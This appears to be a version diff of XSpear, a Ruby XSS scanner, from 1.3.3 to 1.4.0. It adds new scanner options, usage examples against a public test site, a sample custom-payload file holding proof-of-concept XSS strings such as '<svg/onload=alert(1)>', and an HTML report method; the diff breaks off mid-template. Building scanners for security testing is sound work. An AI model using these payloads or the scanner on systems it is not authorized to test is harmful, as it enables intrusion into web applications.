XSpear 1.3.3 → 1.4.0

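--- a/checksums.yaml
+++ b/checksums.yaml
@@ -1,7 +1,7 @@
 ---
 SHA256:
-metadata.gz: afb284c2c76350733a45156127bde1e8fd996a6aabf985b3eef8a1b43e8147a7
-data.tar.gz: f4411c5bdfb84d3ad32a87f34e1ffcd98a7ead48761b07134fcc82f5ded53f5b
+metadata.gz: 32c726b87b11934044cacd01471bedab0f407185be09ba5018ec7f127d2f111d
+data.tar.gz: 1faaf797b99c0e23a7280071c8cd9f010ff23c94dfd29d08edb116bb08b65b0e
 SHA512:
-metadata.gz: e031af8d10adfcdb511df45e0e9a34c19df1fdcbfc4bdcaf9179c584f25cf66df9d805204b85a8ef3c108495fa663c6e78dcc861549532d48556b867c9e5f65e
-data.tar.gz: 9dcd8c46a718c459ab7d2b8ebc8a8e4e9181a51d7d0c1c4280219bd3502caa16ea48cbfeb6a3ca02a6fc21d226606801a704ba77824d89bcd07150c3833d3cd8
+metadata.gz: 607af7c1efc237340f376e87a603f5d0f8715de74d0dfa85ca139d1f85406dd3fc2f839b75cb4e9681c2ee3c63e7ced219d1364bc61de7717506a5c63c13c76e
+data.tar.gz: 8d5e0667c104e834e3ea7a87ed9f4a79eca542dbc7c039083fc5c425a40460bc960db03f1aa65bc8522a44a0d0d8e6a55f8736f9da721e6445bca88656f61d27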
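--- a/data/.idea/workspace.xml
+++ b/data/.idea/workspace.xml
@@ -3,6 +3,8 @@
 <component name="ChangeListManager">
 <list default="true" id="4ee2e581-45d7-4c90-b6a1-e92e4b5829dd" name="Default Changelist" comment="">
 <change beforePath="$PROJECT_DIR$/.idea/workspace.xml" beforeDir="false" afterPath="$PROJECT_DIR$/.idea/workspace.xml" afterDir="false" />
+<change beforePath="$PROJECT_DIR$/lib/XSpear.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear.rb" afterDir="false" />
+<change beforePath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" afterDir="false" />
 <change beforePath="$PROJECT_DIR$/lib/XSpear/version.rb" beforeDir="false" afterPath="$PROJECT_DIR$/lib/XSpear/version.rb" afterDir="false" />
 </list>
 <option name="EXCLUDED_CONVERTED_TO_IGNORED" value="true" />
@@ -19,29 +21,26 @@
 <file pinned="false" current-in-tab="false">
 <entry file="file://$PROJECT_DIR$/exe/XSpear">
 <provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="900">
-<caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
+<state relative-caret-position="1084">
+<caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
 </state>
 </provider>
 </entry>
 </file>
 <file pinned="false" current-in-tab="false">
-<entry file="file://$PROJECT_DIR$/README.md">
-<provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
-<state split_layout="SPLIT">
-<first_editor relative-caret-position="6840">
-<caret line="456" column="38" selection-start-line="456" selection-start-column="38" selection-end-line="456" selection-end-column="38" />
-</first_editor>
-<second_editor />
+<entry file="file://$PROJECT_DIR$/raw_sample.txt">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="30">
+<caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
 </state>
 </provider>
 </entry>
 </file>
-<file pinned="false" current-in-tab="false">
+<file pinned="false" current-in-tab="true">
 <entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
 <provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="1095">
-<caret line="73" selection-start-line="73" selection-end-line="73" />
+<state relative-caret-position="217">
+<caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
 </state>
 </provider>
 </entry>
@@ -49,31 +48,35 @@
 <file pinned="false" current-in-tab="false">
 <entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
 <provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="316">
-<caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
+<state relative-caret-position="260">
+<caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
 </state>
 </provider>
 </entry>
 </file>
 <file pinned="false" current-in-tab="false">
-<entry file="file://$PROJECT_DIR$/bin/console">
-<provider selected="true" editor-type-id="text-editor" />
+<entry file="file://$PROJECT_DIR$/report.html">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="75">
+<caret line="5" selection-start-line="5" selection-end-line="5" />
+</state>
+</provider>
 </entry>
 </file>
 <file pinned="false" current-in-tab="false">
-<entry file="file://$PROJECT_DIR$/lib/XSpear/log.rb">
+<entry file="file://$PROJECT_DIR$/custom_payload.json">
 <provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="195">
-<caret line="13" column="38" selection-start-line="13" selection-start-column="38" selection-end-line="13" selection-end-column="38" />
+<state relative-caret-position="150">
+<caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
 </state>
 </provider>
 </entry>
 </file>
-<file pinned="false" current-in-tab="true">
+<file pinned="false" current-in-tab="false">
 <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
 <provider selected="true" editor-type-id="text-editor">
 <state relative-caret-position="15">
-<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+<caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
 </state>
 </provider>
 </entry>
@@ -113,7 +116,6 @@
 <component name="FindInProjectRecents">
 <findStrings>
 <find>BLINDNOTDETECTED</find>
-<find>@all</find>
 <find>@reflected_params</find>
 <find>@thread</find>
 <find>thread</find>
@@ -126,6 +128,8 @@
 <find>EH</find>
 <find>CSP</find>
 <find>URI::encode</find>
+<find>@all</find>
+<find>for reflected</find>
 </findStrings>
 </component>
 <component name="Git.Settings">
@@ -135,24 +139,27 @@
 <option name="CHANGED_PATHS">
 <list>
 <option value="$PROJECT_DIR$/lib/XSpear/banner.rb" />
-<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
 <option value="$PROJECT_DIR$/config.json" />
 <option value="$PROJECT_DIR$/lib/XSpear/log.rb" />
-<option value="$PROJECT_DIR$/exe/XSpear" />
 <option value="$PROJECT_DIR$/README.md" />
 <option value="$PROJECT_DIR$/XSpear.gemspec" />
 <option value="$PROJECT_DIR$/forBurp/otwa.sh" />
 <option value="$PROJECT_DIR$/forBurp/README.md" />
-<option value="$PROJECT_DIR$/lib/XSpear.rb" />
+<option value="$PROJECT_DIR$/raw_sample.txt" />
+<option value="$PROJECT_DIR$/exe/XSpear" />
+<option value="$PROJECT_DIR$/report.html" />
+<option value="$PROJECT_DIR$/custom_payload.json" />
 <option value="$PROJECT_DIR$/lib/XSpear/version.rb" />
+<option value="$PROJECT_DIR$/lib/XSpear.rb" />
+<option value="$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb" />
 </list>
 </option>
 </component>
-<component name="ProjectFrameBounds">
+<component name="ProjectFrameBounds" extendedState="6">
 <option name="x" value="-1920" />
-<option name="y" value="-620" />
+<option name="y" value="-643" />
 <option name="width" value="1920" />
-<option name="height" value="1057" />
+<option name="height" value="1080" />
 </component>
 <component name="ProjectLevelVcsManager" settingsEditedManually="true">
 <ConfirmationsSetting value="2" id="Add" />
@@ -162,6 +169,7 @@
 <foldersAlwaysOnTop value="true" />
 </navigator>
 <panes>
+<pane id="Scope" />
 <pane id="ProjectPane">
 <subPane>
 <expand>
@@ -199,7 +207,6 @@
 <select />
 </subPane>
 </pane>
-<pane id="Scope" />
 </panes>
 </component>
 <component name="PropertiesComponent">
@@ -266,63 +273,8 @@
 <workItem from="1577115206395" duration="21990000" />
 <workItem from="1580314696983" duration="286000" />
 <workItem from="1580583824837" duration="1470000" />
-<workItem from="1581089876742" duration="268000" />
-</task>
-<task id="LOCAL-00030" summary="(1.0.6)[fixed #6] Edit Static Analysis code">
-<created>1563893769120</created>
-<option name="number" value="00030" />
-<option name="presentableId" value="LOCAL-00030" />
-<option name="project" value="LOCAL" />
-<updated>1563893769120</updated>
-</task>
-<task id="LOCAL-00031" summary="(1.0.6)[fixed #7] CallbackNotAdded 쪽 분기문 수정">
-<created>1563893901111</created>
-<option name="number" value="00031" />
-<option name="presentableId" value="LOCAL-00031" />
-<option name="project" value="LOCAL" />
-<updated>1563893901111</updated>
-</task>
-<task id="LOCAL-00032" summary="(1.0.6)[fixed #4] Report 객체 수정">
-<created>1563894048747</created>
-<option name="number" value="00032" />
-<option name="presentableId" value="LOCAL-00032" />
-<option name="project" value="LOCAL" />
-<updated>1563894048747</updated>
-</task>
-<task id="LOCAL-00033" summary="(1.0.6)[fixed #8] Added response header analysis module">
-<created>1563894186608</created>
-<option name="number" value="00033" />
-<option name="presentableId" value="LOCAL-00033" />
-<option name="project" value="LOCAL" />
-<updated>1563894186608</updated>
-</task>
-<task id="LOCAL-00034" summary="(1.0.6)[fixed #9] Added method in report-cli">
-<created>1563894430592</created>
-<option name="number" value="00034" />
-<option name="presentableId" value="LOCAL-00034" />
-<option name="project" value="LOCAL" />
-<updated>1563894430592</updated>
-</task>
-<task id="LOCAL-00035" summary="(1.0.6) Edit report &amp; scanning format">
-<created>1563895638242</created>
-<option name="number" value="00035" />
-<option name="presentableId" value="LOCAL-00035" />
-<option name="project" value="LOCAL" />
-<updated>1563895638242</updated>
-</task>
-<task id="LOCAL-00036" summary="(1.0.6)[fixed #5] Add blind-xss other pattern">
-<created>1563895850670</created>
-<option name="number" value="00036" />
-<option name="presentableId" value="LOCAL-00036" />
-<option name="project" value="LOCAL" />
-<updated>1563895850670</updated>
-</task>
-<task id="LOCAL-00037" summary="(1.0.6) Releases 1.0.6 version">
-<created>1563896026689</created>
-<option name="number" value="00037" />
-<option name="presentableId" value="LOCAL-00037" />
-<option name="project" value="LOCAL" />
-<updated>1563896026689</updated>
+<workItem from="1581089876742" duration="615000" />
+<workItem from="1581425741728" duration="13911000" />
 </task>
 <task id="LOCAL-00038" summary="(1.0.6) Edit README.md">
 <created>1563896886094</created>
@@ -611,11 +563,67 @@
 <option name="project" value="LOCAL" />
 <updated>1581090128596</updated>
 </task>
-<option name="localTasksCounter" value="79" />
+<task id="LOCAL-00079" summary="Release 1.3.3 (Added New XSS Payloads)">
+<created>1581090457081</created>
+<option name="number" value="00079" />
+<option name="presentableId" value="LOCAL-00079" />
+<option name="project" value="LOCAL" />
+<updated>1581090457081</updated>
+</task>
+<task id="LOCAL-00080" summary="(1.4 / Closed #51) Added only param analysis options">
+<created>1581426071038</created>
+<option name="number" value="00080" />
+<option name="presentableId" value="LOCAL-00080" />
+<option name="project" value="LOCAL" />
+<updated>1581426071038</updated>
+</task>
+<task id="LOCAL-00081" summary="(1.4 / Closed #51) Added only param analysis options">
+<created>1581427060990</created>
+<option name="number" value="00081" />
+<option name="presentableId" value="LOCAL-00081" />
+<option name="project" value="LOCAL" />
+<updated>1581427060990</updated>
+</task>
+<task id="LOCAL-00082" summary="(1.4 / Closed #41) Added custom payload option">
+<created>1581428107580</created>
+<option name="number" value="00082" />
+<option name="presentableId" value="LOCAL-00082" />
+<option name="project" value="LOCAL" />
+<updated>1581428107580</updated>
+</task>
+<task id="LOCAL-00083" summary="(1.4 / Closed #41) Added custom payload option">
+<created>1581428482520</created>
+<option name="number" value="00083" />
+<option name="presentableId" value="LOCAL-00083" />
+<option name="project" value="LOCAL" />
+<updated>1581428482520</updated>
+</task>
+<task id="LOCAL-00084" summary="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl">
+<created>1581430796984</created>
+<option name="number" value="00084" />
+<option name="presentableId" value="LOCAL-00084" />
+<option name="project" value="LOCAL" />
+<updated>1581430796984</updated>
+</task>
+<task id="LOCAL-00085" summary="(1.4 / Closed #52) Added HTML Report">
+<created>1581529060550</created>
+<option name="number" value="00085" />
+<option name="presentableId" value="LOCAL-00085" />
+<option name="project" value="LOCAL" />
+<updated>1581529060550</updated>
+</task>
+<task id="LOCAL-00086" summary="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정">
+<created>1581530432559</created>
+<option name="number" value="00086" />
+<option name="presentableId" value="LOCAL-00086" />
+<option name="project" value="LOCAL" />
+<updated>1581530432559</updated>
+</task>
+<option name="localTasksCounter" value="87" />
 <servers />
 </component>
 <component name="TimeTrackingManager">
-<option name="totallyTimeSpent" value="76057000" />
+<option name="totallyTimeSpent" value="90315000" />
 </component>
 <component name="TodoView">
 <todo-panel id="selected-file">
@@ -627,10 +635,10 @@
 </todo-panel>
 </component>
 <component name="ToolWindowManager">
-<frame x="-1920" y="-620" width="1920" height="1057" extended-state="0" />
+<frame x="-1920" y="-620" width="1920" height="1057" extended-state="6" />
 <editor active="true" />
 <layout>
-<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.1368477" />
+<window_info active="true" content_ui="combo" id="Project" order="0" visible="true" weight="0.13791268" />
 <window_info id="Structure" order="1" side_tool="true" weight="0.25" />
 <window_info id="Favorites" order="2" side_tool="true" />
 <window_info anchor="bottom" id="Message" order="0" />
@@ -656,12 +664,6 @@
 <option name="version" value="1" />
 </component>
 <component name="VcsManagerConfiguration">
-<MESSAGE value="(1.1.1) Add code level function &amp; Check WAF code frame" />
-<MESSAGE value="(1.1.2) Releases &amp; Fixed #17 (Add some event handlers..)" />
-<MESSAGE value="(1.1.3) Releases &amp; Fixed #18 (Add onload* event handler)" />
-<MESSAGE value="(1.1.4) [Fixed #20 #22] Modified JSON Format&amp;Remove Color in XSpearReporter" />
-<MESSAGE value="(1.1.4) [Fixed #19] Add http.code, message log, edit log format on verbose=3" />
-<MESSAGE value="(1.1.4) Released 1.1.4" />
 <MESSAGE value="(1.1.5)(Fixed #21) not reflected params , no testing. but alway blind xss, other bug fix" />
 <MESSAGE value="(1.1.5) Released 1.1.5" />
 <MESSAGE value="(1.1.6) (Fixed #24) Edit Usage" />
@@ -681,7 +683,13 @@
 <MESSAGE value="Released 1.3.2" />
 <MESSAGE value="(Fixed #49) Add onpointerrawupdate event handler for xss" />
 <MESSAGE value="(Fixed #50) Add SVG Animate XSS Payload" />
-<option name="LAST_COMMIT_MESSAGE" value="(Fixed #50) Add SVG Animate XSS Payload" />
+<MESSAGE value="Release 1.3.3 (Added New XSS Payloads)" />
+<MESSAGE value="(1.4 / Closed #51) Added only param analysis options" />
+<MESSAGE value="(1.4 / Closed #41) Added custom payload option" />
+<MESSAGE value="(1.4 / Fixed #42) Bug fix --raw options, added --raw-ssl" />
+<MESSAGE value="(1.4 / Closed #52) Added HTML Report" />
+<MESSAGE value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
+<option name="LAST_COMMIT_MESSAGE" value="(1.4 / Closed #53) 코드 반영하여 테스트한 결과 기존 로직이 훨씬 빨라서 변경하지 않을 예정" />
 </component>
 <component name="editorHistoryManager">
 <entry file="file://$USER_HOME$/.rvm/gems/ruby-2.4.6/gems/bundler-2.0.1/lib/bundler/rubygems_integration.rb">
@@ -741,13 +749,6 @@
 </state>
 </provider>
 </entry>
-<entry file="file://$PROJECT_DIR$/exe/XSpear">
-<provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="900">
-<caret line="60" column="77" selection-start-line="60" selection-start-column="77" selection-end-line="60" selection-end-column="77" />
-</state>
-</provider>
-</entry>
 <entry file="file://$PROJECT_DIR$/README.md">
 <provider selected="true" editor-type-id="split-provider[text-editor;markdown-preview-editor]">
 <state split_layout="SPLIT">
@@ -758,13 +759,6 @@
 </state>
 </provider>
 </entry>
-<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
-<provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="1095">
-<caret line="73" selection-start-line="73" selection-end-line="73" />
-</state>
-</provider>
-</entry>
 <entry file="file://$PROJECT_DIR$/bin/console">
 <provider selected="true" editor-type-id="text-editor" />
 </entry>
@@ -799,17 +793,52 @@
 </state>
 </provider>
 </entry>
-<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+<entry file="file://$PROJECT_DIR$/raw_sample.txt">
 <provider selected="true" editor-type-id="text-editor">
-<state relative-caret-position="316">
-<caret line="539" column="443" selection-start-line="539" selection-start-column="443" selection-end-line="539" selection-end-column="443" />
+<state relative-caret-position="30">
+<caret line="2" column="9" lean-forward="true" selection-start-line="2" selection-start-column="9" selection-end-line="2" selection-end-column="9" />
+</state>
+</provider>
+</entry>
+<entry file="file://$PROJECT_DIR$/report.html">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="75">
+<caret line="5" selection-start-line="5" selection-end-line="5" />
+</state>
+</provider>
+</entry>
+<entry file="file://$PROJECT_DIR$/custom_payload.json">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="150">
+<caret line="10" column="3" selection-start-line="10" selection-start-column="3" selection-end-line="10" selection-end-column="3" />
+</state>
+</provider>
+</entry>
+<entry file="file://$PROJECT_DIR$/exe/XSpear">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="1084">
+<caret line="74" column="82" selection-start-line="74" selection-start-column="82" selection-end-line="74" selection-end-column="82" />
 </state>
 </provider>
 </entry>
 <entry file="file://$PROJECT_DIR$/lib/XSpear/version.rb">
 <provider selected="true" editor-type-id="text-editor">
 <state relative-caret-position="15">
-<caret line="1" column="18" selection-start-line="1" selection-start-column="18" selection-end-line="1" selection-end-column="18" />
+<caret line="1" column="16" selection-start-line="1" selection-start-column="16" selection-end-line="1" selection-end-column="16" />
+</state>
+</provider>
+</entry>
+<entry file="file://$PROJECT_DIR$/lib/XSpear.rb">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="260">
+<caret line="497" lean-forward="true" selection-start-line="497" selection-end-line="497" />
+</state>
+</provider>
+</entry>
+<entry file="file://$PROJECT_DIR$/lib/XSpear/XSpearRepoter.rb">
+<provider selected="true" editor-type-id="text-editor">
+<state relative-caret-position="217">
+<caret line="361" column="39" selection-start-line="361" selection-start-column="39" selection-end-line="361" selection-end-column="39" />
 </state>
 </provider>
 </entry>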
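--- a/data/README.md
+++ b/data/README.md
@@ -33,12 +33,14 @@ XSpear is XSS Scanner on ruby gems
 + Reflected Params
 + All params(for blind xss, anytings)
 + Filtered test `event handler` `HTML tag` `Special Char` `Useful code`
++ Testing custom payload for only you!
 - Testing Blind XSS (with XSS Hunter , ezXSS, HBXSS, Etc all url base blind test...)
 - Dynamic/Static Analysis
 + Find SQL Error pattern
 + Analysis Security headers(`CSP` `HSTS` `X-frame-options`, `XSS-protection` etc.. )
 + Analysis Other headers..(Server version, Content-Type, etc...)
 + XSS Testing to URI Path
++ Testing Only Parameter Analysis (aka no-XSS mode)
 - Scanning from Raw file(Burp suite, ZAP Request)
 - XSpear running on ruby code(with Gem library)
 - Show `table base cli-report` and `filtered rule`, `testing raw query`(url)
@@ -90,14 +92,17 @@ $ gem install progress_bar
 Usage: xspear -u [target] -[options] [value]
 [ e.g ]
 $ xspear -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' -v 1 -a
-$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
+$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 2
+$ xspear -u 'http://testphp.vulnweb.com/listproducts.php?cat=123' -v 0 -o json
 
 [ Options ]
 -u, --url=target_URL [required] Target Url
 -d, --data=POST Body [optional] POST Method Body data
 -a, --test-all-params [optional] test to all params(include not reflected)
+--no-xss [optional] no testing xss, only parameters analysis
 --headers=HEADERS [optional] Add HTTP Headers
 --cookie=COOKIE [optional] Add Cookie
+--custom-payload=FILENAME [optional] Load custom payload json file
 --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt)
 -p, --param=PARAM [optional] Test paramters
 -b, --BLIND=URL [optional] Add vector of Blind XSS
@@ -115,6 +120,7 @@ $ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" -v 2
 --version Show XSpear version
 --update Show how to update
 
+
 ```
 ### Result types
 - (I)NFO: Get information ( e.g sql error , filterd rule, reflected params, etc..)
@@ -198,7 +204,6 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 0
 ```
 
-
 **Set scanning thread**
 ```
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
@@ -215,6 +220,11 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhah
 $ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -a
 ```
 
+**Testing Only parameter analysis (aka no-xss mode)**<br>
+```
+$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" --no-xss
+```
+
 **Testing blind xss(all params)**<br>
 (Should be used as much as possible because Blind XSS is everywhere)<br>
 ```
@@ -223,6 +233,31 @@ $ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwu
 # Set your blind xss host. <-b options>
 ```
 
+**Testing custom payload**<br>
+```
+$ xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=123" --custom-payload=custom_payload.json
+```
+in custom_payload.json file
+```json
+[
+{
+"payload":"<svg/onload=alert(1)>",
+"callback":"P1",
+"descript":"blahblah~"
+},
+{
+"payload":"<svg/onload=alert(1)>",
+"callback":"P2",
+"descript":"blahblah~"
+},
+{
+"payload":"<>",
+"callback":"P1",
+"descript":"blahblah~"
+}
+]
+```
+
 **for Pipeline**<br>
 ```
 $ xspear -u {target} -b "your-blind-xss-host" -a -v 0 -o json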
data/XSpear-1.3.3.gem ADDED
Binary file
@@ -0,0 +1,17 @@
1
+ [
2
+ {
3
+ "payload":"<svg/onload=alert(1)>",
4
+ "callback":"P1",
5
+ "descript":"blahblah~"
6
+ },
7
+ {
8
+ "payload":"<svg/onload=alert(1)>",
9
+ "callback":"P2",
10
+ "descript":"blahblah~"
11
+ },
12
+ {
13
+ "payload":"<>",
14
+ "callback":"P1",
15
+ "descript":"blahblah~"
16
+ }
17
+ ]
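--- a/data/exe/XSpear
+++ b/data/exe/XSpear
@@ -3,6 +3,10 @@ require "XSpear"
 
 XOptions = Struct.new(:url, :data, :headers, :params, :options)
 
+def true?(obj)
+obj.to_s.downcase == "true"
+end
+
 class Parser
 def self.parse(options)
 args = XOptions.new('xspear')
@@ -29,6 +33,10 @@ class Parser
 args.options['all'] = true
 end
 
+opts.on('--no-xss', '[optional] no testing xss, only parameters analysis') do
+args.options['nx'] = true
+end
+
 opts.on('--headers=HEADERS', '[optional] Add HTTP Headers') do |n|
 args.options['headers'] = n
 end
@@ -38,11 +46,17 @@ class Parser
 args.options['cookie'] = 'Cookie: ' + n
 end
 
+opts.on('--custom-payload=FILENAME', '[optional] Load custom payload json file') do |n|
+args.options['cp'] = n
+end
 
 opts.on('--raw=FILENAME', '[optional] Load raw file(e.g raw_sample.txt)') do |n|
 args.options['raw'] = n
 end
 
+opts.on('--raw-ssl=BOOLEAN', '[optional] http/https switch for burp raw file e.g: true/false') do |n|
+args.options['raw-ssl'] = n
+end
 
 opts.on('-p', '--param=PARAM', '[optional] Test paramters') do |n|
 args.options['params'] = n
@@ -58,7 +72,7 @@ class Parser
 end
 
 
-opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json)') do |n|
+opts.on('-o', '--output=FORMAT', '[optional] Output format (cli , json, html)') do |n|
 args.options['output'] = n
 end
 
@@ -129,15 +143,23 @@ if !options.options['raw'].nil?
 end
 end
 end
-
 # Burp or ZAP
 # http, https로 시작하면 zap 아니면 burp 포맷
 url = ""
 if (path.index('http://') == 0 || path.index('https://') == 0)
 url = path
 else
-url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+if options.options['raw-ssl'].nil?
+url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
+else
+if true? options.options['raw-ssl']
+url = "https://"+headers_hash['Host'].to_s.chomp!+"/"+path
+else
+url = "http://"+headers_hash['Host'].to_s.chomp!+"/"+path
+end
+end
 end
+puts url
 options.url = url
 if headers.length > 0
 options.options['headers'] = headers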
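Review bot: `puts url` (new line 162, right after the rebuilt `else` branch in the last hunk) prints the reconstructed target URL to stdout unconditionally, which reads as a leftover debug print and will pollute the output of `-o json`/`-o html` consumers; it should be removed or gated on the verbosity option. The three new `url = ...` branches also keep `headers_hash['Host'].to_s.chomp!`, and `String#chomp!` returns nil when there is nothing to strip, so a raw file whose Host value has no trailing newline raises a TypeError on the `+`; the non-bang `chomp` avoids that and lets the branches collapse to one expression. The absence of `--raw-ssl` now silently defaults to `https://` where the old line used `http://`, and the option text in the earlier hunk does not say so; `'[optional] http/https switch for burp raw file e.g: true/false (default: true)'` would document it. The enclosing `if !options.options['raw'].nil?` block starts outside the hunk.
```ruby
  else
    # https unless --raw-ssl is given and is not "true"; chomp (not chomp!) so a
    # Host value without a trailing newline cannot turn the expression into nil.
    raw_ssl = options.options['raw-ssl']
    scheme = (raw_ssl.nil? || true?(raw_ssl)) ? "https://" : "http://"
    url = scheme + headers_hash['Host'].to_s.chomp + "/" + path
  end
  # … unchanged: options.url = url and headers assignment (puts url dropped) …
```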
@@ -1,4 +1,5 @@
1
1
  require 'terminal-table'
2
+ require 'cgi'
2
3
 
3
4
  IssueStruct = Struct.new(:id, :type, :issue, :method, :param, :payload, :description)
4
5
  class IssueStruct
@@ -29,7 +30,7 @@ class XspearRepoter
29
30
  # desc
30
31
  # category
31
32
  # callback
32
- @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MIDUM".yellow,"h"=>"HIGH".light_red}
33
+ @rtype = {"i"=>"INFO".blue,"v"=>"VULN".red,"l"=>"LOW".green,"m"=>"MEDIUM".yellow,"h"=>"HIGH".light_red}
33
34
  @rissue = {"f"=>"FILERD RULE","r"=>"REFLECTED","x"=>"XSS","s"=>"STATIC ANALYSIS","d"=>"DYNAMIC ANALYSIS"}
34
35
  end
35
36
 
@@ -62,6 +63,356 @@ class XspearRepoter
62
63
  @endtime = Time.now
63
64
  end
64
65
 
66
+ def to_html
67
+ rurl = ""
68
+ if @url.length > 66
69
+ rurl = @url[0..66]+"... (snip)"
70
+ else
71
+ rurl = @url
72
+ end
73
+ t_info= "Testing to <a href='#{CGI.escapeHTML @url}'>#{CGI.escapeHTML rurl}</a><br>Found #{@issue.length} issues and running on #{@starttime} ~ #{@endtime} "
74
+ t_issue = ""
75
+ t_available = ""
76
+ t_rawquery = ""
77
+ @issue.each do |i|
78
+ i[1] = i[1].uncolorize
79
+ i[6] = i[6].uncolorize
80
+ # NO TYPE ISSUE METHOD PARAM PAYLOAD DESCRIPTION
81
+ t_issue = t_issue + "<tr class='#{i[1]} ISSUE'><td>#{i[0]}</td><td>#{i[1]}</td><td>#{CGI.escapeHTML i[2]}</td><td>#{i[3]}</td><td>#{CGI.escapeHTML i[4]}</td><td>#{CGI.escapeHTML i[5]}</td><td>#{CGI.escapeHTML i[6]}</td></tr>" #(i[0],i[1],i[2],i[3],i[4],i[5],i[6])
82
+ end
83
+ @filtered_objects.each do |key, value|
84
+ begin
85
+ eh = []
86
+ tag = []
87
+ sc = []
88
+ uc = []
89
+ t_available = t_available + "<code>#{key}</code> param<br>"
90
+ value.each do |n|
91
+ if n.include? "=64"
92
+ # eh
93
+ eh.push n.chomp("=64")
94
+ elsif n.include? "xsp<"
95
+ # tag
96
+ n = n.sub("xsp<","")
97
+ tag.push n.chomp(">")
98
+ elsif n.include? ".xspear"
99
+ # uc
100
+ uc.push n.sub(".xspear","")
101
+ else
102
+ # sc
103
+ sc.push n.sub("XsPeaR","")
104
+ end
105
+ end
106
+ as = ""#sc.map(&:inspect).join(',')
107
+ ae = ""#eh.map(&:inspect).join(',')
108
+ at = ""#tag.map(&:inspect).join(',')
109
+ ac = ""#uc.map(&:inspect).join(',')
110
+
111
+ sc.each do |z|
112
+ as = as + "<code>#{CGI.escapeHTML z}</code> "
113
+ end
114
+ eh.each do |z|
115
+ ae = ae + "<code>#{CGI.escapeHTML z}</code> "
116
+ end
117
+ tag.each do |z|
118
+ at = at + "<code>#{CGI.escapeHTML z}</code> "
119
+ end
120
+ uc.each do |z|
121
+ ac = ac + "<code>#{CGI.escapeHTML z}</code> "
122
+ end
123
+
124
+ t_available = t_available + """
125
+ <table>
126
+ <tr>
127
+ <td width='50%'>
128
+ <table>
129
+ <tr>
130
+ <td>Category</td>
131
+ <td>Data</td>
132
+ </tr>
133
+ <tr><td style='width:150px;'>HTML Tag</td><td>#{at}</td></tr>
134
+ <tr><td style='width:150px;'>Useful Code</td><td>#{ac}</td></tr>
135
+ <tr><td style='width:150px;'>Special Char</td><td>#{as}</td></tr>
136
+
137
+ </table>
138
+ </td>
139
+ <td><table>
140
+ <tr>
141
+ <td>Category</td>
142
+ <td>Data</td>
143
+ <tr><td style='width:150px;'>Event Handler</td><td>#{ae}</td></tr>
144
+ </tr>
145
+
146
+ </table>
147
+ </td>
148
+ </tr>
149
+ </table>
150
+ """
151
+ rescue
152
+ end
153
+ end
154
+ if @filtered_objects.length == 0
155
+ end
156
+ begin
157
+ @query.each_with_index do |q, i|
158
+ html_q = "#{@url.sub(URI.parse(@url).query,"")}"+q
159
+ t_rawquery = t_rawquery + "<li><a href='#{CGI.escapeHTML html_q}'>[#{i}] #{CGI.escapeHTML html_q}</a></li>"
160
+ end
161
+ rescue
162
+ end
163
+ report = """
164
+ <style>
165
